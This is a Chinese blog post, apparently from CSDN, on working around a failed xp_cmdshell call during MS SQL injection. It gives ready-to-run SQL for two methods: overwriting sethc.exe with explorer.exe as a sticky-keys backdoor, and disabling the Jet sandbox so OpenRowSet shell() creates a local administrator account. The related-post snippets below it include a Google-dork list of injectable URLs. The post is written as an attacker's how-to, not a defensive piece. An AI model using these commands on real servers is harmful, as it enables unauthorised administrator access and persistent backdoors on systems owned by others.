mssql exec xp_cmdshell 调用'CreateProcess'失败解决办法

最新推荐文章于 2021-03-20 18:09:07 发布
最新推荐文章于 2021-03-20 18:09:07 发布
阅读量6.5k 收藏 1
点赞数 1
分类专栏: SQL 技术 文章标签: xp database windows shell null oo
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yatere/article/details/6361234
版权

mssql 数据库注入时 exec xp_cmdshell 调用 'CreateProcess' 失败的解决办法。

    微软ms sql 2000/2005 注入时exec xp_cmdshell 调用 'CreateProcess' 失败,错误代码: '5',两种解决办法。

    原因不说了,一般都是cmd.exe被限制权限了,system用户没有权限,解决方法2种:

1、替换shift文件(在开启3389情况下):

    下面两条语句为分别执行的。

    这条语句将explorer.exe复制为sethc.exe

    declare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:/windows/explorer.exe','c:/windows/system32/sethc.exe';

    这条语句将sethc.exe复制到dllcache目录下

    declare @oo int exec sp_oacreate 'scripting.filesystemobject', @oo out exec sp_oamethod @oo, 'copyfile',null,'c:/windows/system32/sethc.exe','c:/windows/system32/dllcache/sethc.exe';

    另外这两条语句使用到的sp_oacreate存储过程需要使用到odsole70.dll这个文件,所以这个文件的存亡,关系到创建的成功与否。

2、直接开启acess的沙盘(沙盒),来执行命令:

EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare/Microsoft/Jet/4.0/Engines','SandBoxMode','REG_DWORD',0
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:/windows/system32/ias/ias.mdb','select shell("net user 123 123 /add")');
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:/windows/system32/ias/ias.mdb','select shell("net localgroup administrators 123 /add")');

注意:如果是 Windows 2000,则将以上 Windows 目录改成 winnt。

Yatere
关注
专栏目录
调用MSSQLSERVER的系统过程xp_cmdshell发生错误:xpsql.cpp: 错误 来自 GetProxyAccount
平凡在心,悠然自得。【顽石潇云】
02-01 2540
--消息 50001,级别 1,状态 50001--xpsql.cpp: 错误 87 来自 GetProxyAccount(第 604 行)打开SQLSERVER的企业管理器,进入“管理”,右键点击“Sql Server代理”点击属性;首先你要“允许非SysAdmin权限的用户执行CmdExec.....”,然后指定一个账号。不过,你需要意识到这样做所存在的安全上的风险。有关英文回复:Yo
1433修复命令大全 提权错误修复.txt
03-13
1433修复命令大全 提权错误修复.txt
执行xp_cmdshell时发生错误--xpsql.cpp: 错误 5 来自 CreateProcess
09-25 5037
错误代码:xpsql.cpp: 错误 5 来自 CreateProcess 错误原因分析:xp_cmdshell没有执行CMD的权限。 解决方法:给CMD添加system的执行权限。
关于master..xp_cmdshell’的几个错误解决办法
雅冰石的专栏
01-22 1万+
错误一:Error Message:未能找到存储过程 ‘master..xp_cmdshell’。 第一步先删除: drop procedure sp_addextendedproc drop procedure sp_oacreate exec sp_dropextendedproc ‘xp_cmdshell’ 服务器: 消息 3701,级别 11,状态 5,行 1 第二步恢复:
SQL Server阻止了对组件xp_cmdshell过程的解决方案.docx
06-23
SQL Server阻止了对组件xp_cmdshell过程的解决方案。 错误描述:SQL Server阻止了对组件‘xp_cmdshell’的过程‘sys.xp_cmdshell’的访问。因为此组件已作为此服务嚣安全配置的一部分而被关闭。系统管理员可以通过使用sp_configure启用‘xp_cmdshell’。有关启用‘xp_cmdshell’的详细信息,请参阅sQL帮助文件。
SQL SERVER 2008 执行xp_cmdshell的过程中出错,调用createprocess失败,错误代码 5 解决方案
u012949335的专栏
03-20 1万+
1、进入 控制面板----管理工具------本地安全策略 点击 本地策略--------安全选项 把“网络安全:LAN管理器身份验证级别”双击打开,选择“发送LM和NTLM响应”(原来是“没有定义”)。确认后,重新启动服务器,该问题即能解决。 ...
SQL Server 无法将“WIN-C6BGU7K6VUR”配置为分发服务器
Auspicious航的博客
03-05 1882
1、SQL Server2008数据库在进行开启复制分发的配置时,出现了报错: 正在配置... - 正在配置分发服务器 (错误) 消息 SQL Server 无法将“WIN-C6BGU7K6VUR”配置为分发服务器。 (Microsoft.SqlServer.ConnectionInfo) ------------------------------ 其他信息: 执行 Tr...
SQL Server 2012 xp_cmdshell不能执行的解决办法
学习是一种习惯
07-10 7849
        一个很早的系统,数据库一直跑的好好的,但在最近就无法执行压缩备份文件了,以至于1TB的硬盘很快就撑爆了。查了很久也没有找到原因,按照网上的很多方法都试了一遍,结果都不行。        这里要说一下啊,2008版本以后的sql server与之前版本的有很大的不同,就“外围应用“来讲,低版本中都是在操作系统的应用里可以看到的单独的应用,到了高版本后它变成了数据库实例的右键菜单里的一...
pipe-CMD.rar_CMD回显_CreateProcess_c++ cmd pipe_windows管道cmd_管道 c
07-15
利用管道执行cmd,显示回显内容,管道加createprocess实现该功能
abc.rar_ABC_BOOL CreateProcess_CreateProcess
最新发布
09-24
通过函数 BOOL CreateProcess(LPCTSTR lpApplicationName,LPTSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes, LPSECURITY_ATTRIBUTES lpThreadAttributes, BOOL bInheritHandles, DWORD ...
dll_charu.rar_CreateProcess_createprocess dll_creatprocess的dll
09-23
《DLL注入:深入理解CreateProcess与DLL的动态加载》 在Windows操作系统中,程序的执行并不总是静态的。有时候,我们需要在程序运行时动态地加载和执行其他代码,这就是DLL(Dynamic Link Library)注入的基本思想...
Qt编译过程出现错误process_begin: CreateProcess(NULL, rm -f debug/moc_predefs.h, …) failed的解决办法
01-07
目前尚未解决,先记录一下。有知道的朋友不妨留言告知,谢谢。 Makefile.Debug:168: recipe for target 'compiler_moc_predefs_clean' failed process_begin: CreateProcess(NULL, rm -f debug/moc_predefs.h, ...) ...
在执行xp_cmdshell的过程中出错,调用'LogonUserW'失败,错误代码:'1909'
weixin_33856370的博客
10-23 835
     在上篇文章Could not obtain information about Windows NT group/user 'xxxx\xxxx', error code 0x5里面,我介绍了SQL Server服务启动账号域账号锁定的情况下,有些Job Owner为域账号的作业执行会报错,其实在域账号被锁定的情况下(该域账号是SQL Server服务的启动账号),执行xp_cmdshe...
EXEC开启xp_cmdshell存储过程
weixin_38168918的博客
07-25 175
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1; EXEC sp_configure 'show advanced options', 0; RECONFIGURE; 转载于:https://www.cnblogs.c...
设置sqlxp_cmdshell 可执行
weixin_34082789的博客
10-30 230
2019独角兽企业重金招聘Python工程师标准>>> ...
部分google hacking的搜索内容
热门推荐
Yatere的天平秤
09-05 5万+
inurl:index.php?id= inurl:trainers.php?id= inurl:buy.php?category= inurl:article.php?ID= inurl:play_old.php?id= inurl:declaration_more.
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值